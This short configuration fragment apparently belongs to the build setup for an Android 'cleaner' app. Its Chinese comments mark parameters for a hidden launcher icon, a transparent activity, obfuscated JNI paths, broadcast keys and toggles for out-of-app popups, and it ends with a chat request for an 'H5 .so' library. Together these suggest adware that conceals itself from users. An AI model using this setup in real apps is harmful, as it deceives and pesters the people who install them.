// 这里面的信息都需要修改
cnvb['com.eighth.day.lunar', 'com.cleansonic.sda.junkvanish',  # 包名
               'vrv.bggt.Vnn',# 透明activity
               'nnc/lk/HunR',  #  广播
               '','com.eighth.day.lunar.EcQi',  # 隐藏图标 other1","main2
               'ecf/jk/Kac', '"snnPl"',  # jni路径及函数
               '/qpwo',# 外弹文件开关名
               '"eiru"',# 广播接收key
               '"tyal"',  # 恢复
               '"skdj"',  # 隐藏
               '"polk"']  # 外弹


djfhg['com.eighth.day.lunar', 'com.cleansonic.sda.junkvanish',  # 包名
                  'ecf/jk/Kac',
                   '"nneCs"','"nneCp"', '"nneCz"',
                  'ncc/kg/SnnA',  # hander
                  'ncc/kg/Fgjh',  # wvcClass WebViewClient
                  'ncc/kg/Ritu',  # WccClass WebChormeClient
                  '/qpwo']#文件开关

钟哥，给一下H5的So呢，包名：com.cleansonic.sda.junkvanish